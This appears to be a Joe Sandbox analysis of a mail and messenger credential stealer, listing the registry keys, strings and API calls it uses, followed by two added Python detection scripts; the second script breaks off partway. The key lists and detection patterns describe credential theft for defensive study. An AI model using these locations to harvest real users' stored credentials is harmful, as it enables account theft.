• API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
• String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
• API String ID: 745651260-375988210
• Opcode ID: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
• Instruction ID: 177dcc30e6d6fe1e6f6b961e060c6fa8e32a60297cdf5fc43279ddd28c1616a1
• Opcode Fuzzy Hash: 3ead8dc900f3123aa2ba669505af08cf64fa6c44fe5d0b8ef6125ed5f56e8d9c
• Instruction Fuzzy Hash: 3661A075408341DBDB20AFA1DC88A9FB7F8BF85305F00093FF545A21A2DB789904CB5A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00410166: FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
• LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C22
• GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C37
• _mbscpy.MSVCRT ref: 00403E41
Strings
• PStoreCreateInstance, xrefs: 00403C31
• www.google.com/Please log in to your Google Account, xrefs: 00403C87
• Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D28
• Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D5B
• Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CC3
• www.google.com/Please log in to your Gmail account, xrefs: 00403C73
• www.google.com:443/Please log in to your Google Account, xrefs: 00403C91
• pstorec.dll, xrefs: 00403C1D
• www.google.com:443/Please log in to your Gmail account, xrefs: 00403C7D
• Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D2F
• Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403D91
• Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CE8
Memory Dump Source
• Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                                                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                                                      • API String ID: 1197458902-317895162
                                                                                                                                                                                                                      • Opcode ID: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                                                                                                                                                                                                      • Instruction ID: 8c3092e028ed30b7bcb0bf0438431f6e947b4810b401e401bf51def59c6c6aaf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C51A571600615B6E714AF71CD86FEAB76CAF00709F20053FF904B61C2DBBDBA5486A9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph

(rendered graph not preserved; basic blocks and their successors recovered from the graph text)
• 231: 40f478-40f4ad, call 4446d0, RegOpenKeyExA -> 234, 235
• 234: 40f4b3-40f4c7, RegOpenKeyExA -> 236, 237
• 235: 40f5af-40f5b5 (no successors)
• 236: 40f5a5-40f5a9, RegCloseKey -> 235
• 237: 40f4cd-40f4f6, RegQueryValueExA -> 238, 239
• 238: 40f59b-40f59f, RegCloseKey -> 236
• 239: 40f4fc-40f50b, call 40472f -> 238, 242
• 242: 40f511-40f549, call 4047a0 -> 238, 245
• 245: 40f54b-40f553 -> 246, 247
• 246: 40f591-40f595, LocalFree -> 238
• 247: 40f555-40f58c, memcpy * 2, call 40f177 -> 246
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4A9
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4C3
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E6C,?), ref: 0040F4EE
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E6C,?), ref: 0040F59F
                                                                                                                                                                                                                        • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                        • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040F55C
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040F571
                                                                                                                                                                                                                        • Part of subcall function 0040F177: RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                                                                                                                                                                                                        • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1BF
                                                                                                                                                                                                                        • Part of subcall function 0040F177: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                                                                                                                                                                                                        • Part of subcall function 0040F177: RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E6C,?), ref: 0040F595
                                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E6C,?), ref: 0040F5A9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                                                      • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                                                                      • API String ID: 2768085393-888555734
                                                                                                                                                                                                                      • Opcode ID: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                                                                                      • Instruction ID: 1e95abdde633212bff99c09de4f86b0a88236e9255236bdff490daf84838ddbe
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F316FB2108305BFD710DF51DC80D9BB7ECEB89758F00093AFA84E2151D734D9198BAA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph

(rendered graph not preserved; basic blocks and their successors recovered from the graph text; the API sequence is the MSVCRT mainCRTStartup pattern, which hands off to the program's own code at 40cc66)
• 249: 44412e-44414a, call 44431c, GetModuleHandleA -> 252, 253
• 252: 44414c-444157 -> 253, 254
• 253: 44416b-44416e -> 255
• 254: 444159-444162 -> 256, 257
• 255: 444197-4441e4, __set_app_type, __p__fmode, __p__commode, call 444318 -> 264, 265
• 256: 444164-444169 -> 253, 259
• 257: 444183-444187 -> 253, 260
• 259: 444170-444177 -> 253, 262
• 260: 444189-44418b -> 263
• 262: 444179-444181 -> 263
• 263: 444191-444194 -> 255
• 264: 4441e6-4441f1, __setusermatherr -> 265
• 265: 4441f2-44424c, call 444306, _initterm, __getmainargs, _initterm -> 268, 269
• 268: 44424e-444256 -> 270, 271
• 269: 444288-44428b -> 272, 273
• 270: 44425c-44425f -> 272, 274
• 271: 444258-44425a -> 268, 270
• 272: 444265-444269 -> 275, 276
• 273: 44428d-444291 -> 269
• 274: 444261-444262 -> 272
• 275: 44426f-444280, GetStartupInfoA -> 277, 278
• 276: 44426b-44426d -> 274, 275
• 277: 444282-444286 -> 279
• 278: 444293-444295 -> 279
• 279: 444296-4442aa, GetModuleHandleA, call 40cc66 -> 282, 283
• 282: 4442b3-4442f3, _cexit, call 444355 (no successors)
• 283: 4442ac-4442ad, exit -> 282
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3662548030-0
                                                                                                                                                                                                                      • Opcode ID: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
                                                                                                                                                                                                                      • Instruction ID: fc298a0057bb7b157c7d5bb9a283569fada43ed9a32b195ba4478b44b5386df1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E419F74D00714DFEB209FA4D8897AE7BB4BB85715F20016BF4519B2A2D7B88C82CB58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004437F8
                                                                                                                                                                                                                        • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040732F
                                                                                                                                                                                                                        • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040733A
                                                                                                                                                                                                                        • Part of subcall function 0040732D: _mbscat.MSVCRT ref: 00407351
                                                                                                                                                                                                                        • Part of subcall function 0041072B: memset.MSVCRT ref: 00410780
                                                                                                                                                                                                                        • Part of subcall function 0041072B: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                                                                                                                                                                                                        • Part of subcall function 0041072B: _mbscpy.MSVCRT ref: 004107F7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443866
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443881
                                                                                                                                                                                                                        • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004438BA
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004438C8
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 004438EE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • \Microsoft\Windows Mail, xrefs: 00443816
                                                                                                                                                                                                                      • \Microsoft\Windows Live Mail, xrefs: 0044383D
                                                                                                                                                                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 00443897
                                                                                                                                                                                                                      • Store Root, xrefs: 00443892
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                                                      • API String ID: 832325562-2578778931
                                                                                                                                                                                                                      • Opcode ID: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
                                                                                                                                                                                                                      • Instruction ID: 024f477f45f6e85a7703d2448ebd5bdc30730893e4efb81a5a52e1788c76f972
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 723166B2508344AAF320FB99DC47FCB77DC9B88715F14441FF648D7182EA78964487AA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%
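
Added example, not part of the Joe Sandbox report and not code from the sample. The function listings above together enumerate the registry locations a mail-credential harvester reads: the Outlook profile and Internet Account Manager keys next to the pstorec.dll/PStoreCreateInstance lookup, the IdentityCRL key with its "Dynamic Salt" and "Creds" subkeys (opened relative to the already-open IdentityCRL handle, so telemetry shows the full path), and the Windows Live Mail "Store Root" lookup. The Python below turns that list into a detection: it normalizes registry-open events to HKCU-relative paths (the sample opens them with hKey 80000001, HKEY_CURRENT_USER), maps each to a key family built from the report's strings, and flags a process that touches two or more families. The event schema, the allowlist and the sample events are assumptions and the events are constructed; in practice they would come from Security event 4663 with a SACL on these keys or from an EDR registry sensor, because Sysmon logs registry writes (events 12-14) but not reads.

```python
"""
Added example (not from the Joe Sandbox report or the sample): flag a process
that reads several of the credential-store registry locations listed in the
function entries above. Event schema {pid, image, key} is an assumption.
"""
import re
from collections import defaultdict

# Key families from the strings in the report. The sample opens them under
# HKEY_CURRENT_USER (RegOpenKeyExA hKey 80000001), so paths are HKCU-relative.
CRED_STORE_KEYS = {
    "outlook": re.compile(
        r"^Software\\Microsoft\\Office\\(?:\d+\.\d+\\)?Outlook\\"
        r"(?:Profiles|OMI Account Manager\\Accounts)", re.I),
    "wms_profiles": re.compile(
        r"^Software\\Microsoft\\(?:Windows NT\\CurrentVersion\\)?"
        r"Windows Messaging Subsystem\\Profiles", re.I),
    "internet_account_manager": re.compile(
        r"^Software\\Microsoft\\Internet Account Manager\\Accounts", re.I),
    "identitycrl": re.compile(
        r"^Software\\Microsoft\\IdentityCRL\\(?:Dynamic Salt|Creds)\b", re.I),
    "windows_live_mail": re.compile(
        r"^Software\\Microsoft\\Windows Live Mail\b", re.I),
}

# Prefixes used by different telemetry sources for the same HKCU key.
_PREFIX = re.compile(
    r"^(?:\\REGISTRY\\USER\\S-1-5-[\d-]+\\|HKEY_CURRENT_USER\\|HKCU\\)", re.I)

# Images expected to read their own store (assumption; tune per estate).
ALLOWLIST = {"outlook.exe", "wlmail.exe"}


def normalize_key(key: str) -> str:
    """Return the HKCU-relative path for any of the common key spellings."""
    return _PREFIX.sub("", key.strip())


def classify_key(key: str):
    """Name of the credential-store family a key belongs to, or None."""
    rel = normalize_key(key)
    for family, pattern in CRED_STORE_KEYS.items():
        if pattern.search(rel):
            return family
    return None


def find_credential_sweeps(events, min_families=2):
    """
    Group registry opens by (pid, image) and report every non-allowlisted
    process that touched at least `min_families` distinct families.
    Returns {(pid, image): sorted family names} for the hits.
    """
    touched = defaultdict(set)
    for ev in events:
        family = classify_key(ev["key"])
        if family is not None:
            touched[(ev["pid"], ev["image"])].add(family)
    hits = {}
    for (pid, image), families in touched.items():
        if image.rsplit("\\", 1)[-1].lower() in ALLOWLIST:
            continue
        if len(families) >= min_families:
            hits[(pid, image)] = sorted(families)
    return hits


# Constructed sample events (not from the report), in the order the listings
# above open the keys. The image name follows the report's snapshot file name
# (hcaresult_10_2_400000_wab.jbxd); the pids and SID are made up.
_WAB = r"C:\Program Files\Windows Mail\wab.exe"
SAMPLE_EVENTS = [
    {"pid": 4120, "image": _WAB, "key": r"\REGISTRY\USER\S-1-5-21-1111-2222-3333-1001"
                                        r"\Software\Microsoft\IdentityCRL\Dynamic Salt"},
    {"pid": 4120, "image": _WAB, "key": r"HKCU\Software\Microsoft\IdentityCRL\Creds"},
    {"pid": 4120, "image": _WAB, "key": r"HKCU\Software\Microsoft\Office\16.0\Outlook\Profiles"},
    {"pid": 4120, "image": _WAB, "key": r"HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts"},
    {"pid": 4120, "image": _WAB, "key": r"HKCU\Software\Microsoft\Windows Live Mail"},
    # A mail client reading only its own profile key: not a sweep.
    {"pid": 5500, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "key": r"HKCU\Software\Microsoft\Office\16.0\Outlook\Profiles"},
    # Unrelated key: ignored.
    {"pid": 6000, "image": r"C:\Windows\explorer.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer"},
]

if __name__ == "__main__":
    for (pid, image), families in find_credential_sweeps(SAMPLE_EVENTS).items():
        print(f"pid {pid} {image}: credential-store sweep across {families}")
```

The two-family threshold is what separates a harvester from a client reading its own store: Outlook touching its own profile key is normal, one process walking Outlook, Internet Account Manager, IdentityCRL and Windows Live Mail in sequence is not. The PStore path in the first listing is a library load rather than a registry read, so it needs a separate signal (Sysmon event 7 for pstorec.dll loaded by a process that is not a mail client) and is not covered by this check.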

Control-flow Graph

(rendered graph not preserved; basic blocks and their successors recovered from the graph text)
• 308: 40edd5-40ef32, memset * 2, call 407649 * 2, RegOpenKeyExA -> 313, 314
• 313: 40ef38-40ef5f, RegQueryValueExA -> 315, 316
• 314: 40f04e-40f054 (no successors)
• 315: 40f045-40f048, RegCloseKey -> 314
• 316: 40ef65-40ef69 -> 315, 317
• 317: 40ef6f-40ef79 -> 318, 319
• 318: 40ef7b-40ef8d, call 404666, call 40472f -> 328, 329
• 319: 40efec -> 320
• 320: 40efef-40eff2 -> 315, 322
• 322: 40eff4-40f034, call 4012ee, RegQueryValueExA -> 315, 330
• 328: 40efdf-40efea, call 404780 -> 320
• 329: 40ef8f-40efb3, call 4047a0 -> 328, 335
• 330: 40f036-40f044 -> 315
• 335: 40efb5-40efb8 -> 336, 337
• 336: 40efd6-40efd9, LocalFree -> 328
• 337: 40efba-40efcf, memcpy -> 336
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EEDC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EEF4
                                                                                                                                                                                                                        • Part of subcall function 00407649: _mbsnbcat.MSVCRT ref: 00407669
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040EF2A
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040EF57
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F02C
                                                                                                                                                                                                                        • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                                        • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                        • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040EFC7
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040EFD9
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F048
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2012582556-3916222277
                                                                                                                                                                                                                      • Opcode ID: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
                                                                                                                                                                                                                      • Instruction ID: 747b8e804c7bbb21ad1dd8da88f93546a58f2d2a8080c646c51fe7008e5948b4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83811E618087CB9ECB21DBBC8C445DDBF745F17234F0843A9E5B47A2E2D3245A46C7AA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 338 4037bc-40380e memset * 2 call 443a35 341 4038d4-4038d7 338->341 342 403814-403874 call 4021ad call 406ca4 * 2 strchr 338->342 349 403876-403887 _mbscpy 342->349 350 403889-403894 strlen 342->350 351 4038b1-4038cf _mbscpy call 4023d7 349->351 350->351 352 403896-4038ae sprintf 350->352 351->341 352->351
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004037DD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004037F1
                                                                                                                                                                                                                        • Part of subcall function 00443A35: memset.MSVCRT ref: 00443A57
                                                                                                                                                                                                                        • Part of subcall function 00443A35: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                                                                                                                                                                                                        • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                                        • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 00403860
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040387D
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403889
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 004038A9
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 004038BF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                                                      • String ID: %s@yahoo.com
                                                                                                                                                                                                                      • API String ID: 317221925-3288273942
                                                                                                                                                                                                                      • Opcode ID: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                                                                                                                                                                                                      • Instruction ID: 0355cd0d48ae578dfdfe4a6cbfa0b9af13deca75d91fcedaec1ea3361aee035e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0215773D0412C5EEB21EA55DD41BDA77ACDF45308F0000EBB648F6081E6789F588F55
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 354 4034d6-403536 memset * 2 call 410493 357 403572-403574 354->357 358 403538-403571 _mbscpy call 406af3 _mbscat call 4033e2 354->358 358->357
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004034F6
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040350C
                                                                                                                                                                                                                        • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00403547
                                                                                                                                                                                                                        • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                                                                                        • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040355F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                                                      • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                                                      • API String ID: 3071782539-966475738
                                                                                                                                                                                                                      • Opcode ID: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
                                                                                                                                                                                                                      • Instruction ID: 06cca456285af6d778403e239192c4ceeddf5a100a2cf1fec545289e95a886a3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6901F07294412866EB20F2658C46FCB7A5C9B65705F0000B7BA49F20C3D9F86BD486A9
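The three routines above are the credential-recovery code the signatures "Tries to steal Mail credentials" and "Tries to steal Instant Messenger accounts" refer to: the first opens a key under handle 80000001 with access 00020019, queries values and hands the buffer to a LoadLibraryA/GetProcAddress'd routine before LocalFree; the second builds an account name with "%s@yahoo.com"; the third reads InstallPath under Software\Group Mail and appends fb.dat. The routine listed further down enumerates Software\Google\Google Talk\Accounts with RegEnumKeyExA. The following script is an added example, not part of the Joe Sandbox report or of the sample: it decodes the RegOpenKeyExA argument prefix as the report prints it (hive handle and samDesired, using the constants from winreg.h) and scans a memory dump for the registry paths and format strings listed in this section. The marker list is taken from the String ID lines above; SAMPLE_DUMP and BENIGN_DUMP are constructed inputs, and the threshold of three distinct markers is an assumption chosen so that a generic value name such as InstallPath does not fire on its own.

```python
"""Added example (not from the Joe Sandbox report): decode the RegOpenKeyExA
arguments the report prints for the credential-recovery routines and scan a
memory dump for the credential-store paths those routines reference."""
import re

# Predefined root-key handles and access-right bits from winreg.h / winnt.h.
HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}
ACCESS_BITS = {
    0x00000001: "KEY_QUERY_VALUE",
    0x00000002: "KEY_SET_VALUE",
    0x00000004: "KEY_CREATE_SUB_KEY",
    0x00000008: "KEY_ENUMERATE_SUB_KEYS",
    0x00000010: "KEY_NOTIFY",
    0x00000020: "KEY_CREATE_LINK",
    0x00020000: "STANDARD_RIGHTS_READ",
}
KEY_READ = 0x00020019  # STANDARD_RIGHTS_READ | QUERY_VALUE | ENUMERATE_SUB_KEYS | NOTIFY


def _hex_or_none(token: str):
    """The report prints unknown stack slots as '?'; map those to None."""
    token = token.strip()
    return int(token, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", token) else None


def decode_regopenkeyex(args: str) -> dict:
    """Decode the 'hKey,lpSubKey,ulOptions,samDesired' prefix of a
    RegOpenKeyExA argument list as it appears in the report, e.g.
    '80000001,00000082,00000000,00020019,?,?,?,?,?,00000000'."""
    tokens = args.split(",")
    hkey, _subkey, _options, sam = (_hex_or_none(t) for t in tokens[:4])
    rights = [name for bit, name in ACCESS_BITS.items() if sam is not None and sam & bit]
    hive = HIVES.get(hkey, f"handle 0x{hkey:08x}" if hkey is not None else "unknown")
    return {"hive": hive, "sam_desired": sam, "rights": rights, "is_key_read": sam == KEY_READ}


# Registry paths and format strings listed in this section of the report for
# the mail / instant-messenger credential-recovery routines (ANSI, as the *A
# APIs are used); the UTF-16LE form is scanned too in case a build uses *W.
CREDENTIAL_STORE_MARKERS = [
    b"Software\\Group Mail",
    b"InstallPath",
    b"fb.dat",
    b"%s@yahoo.com",
    b"Software\\Google\\Google Talk\\Accounts",
]


def scan_dump(blob: bytes, markers=CREDENTIAL_STORE_MARKERS) -> list:
    """Return sorted (offset, marker) pairs for every marker occurrence."""
    hits = []
    for marker in markers:
        for encoded in (marker, marker.decode("ascii").encode("utf-16-le")):
            start = 0
            while (i := blob.find(encoded, start)) != -1:
                hits.append((i, marker.decode("ascii")))
                start = i + 1
    return sorted(hits)


def looks_like_credential_recovery(blob: bytes, threshold: int = 3) -> bool:
    """Flag a dump only when several distinct markers co-occur (assumed
    threshold); 'InstallPath' alone is far too common to act on."""
    return len({m for _, m in scan_dump(blob)}) >= threshold


# Constructed inputs standing in for a process memory dump.
SAMPLE_DUMP = (
    b"\x00" * 16
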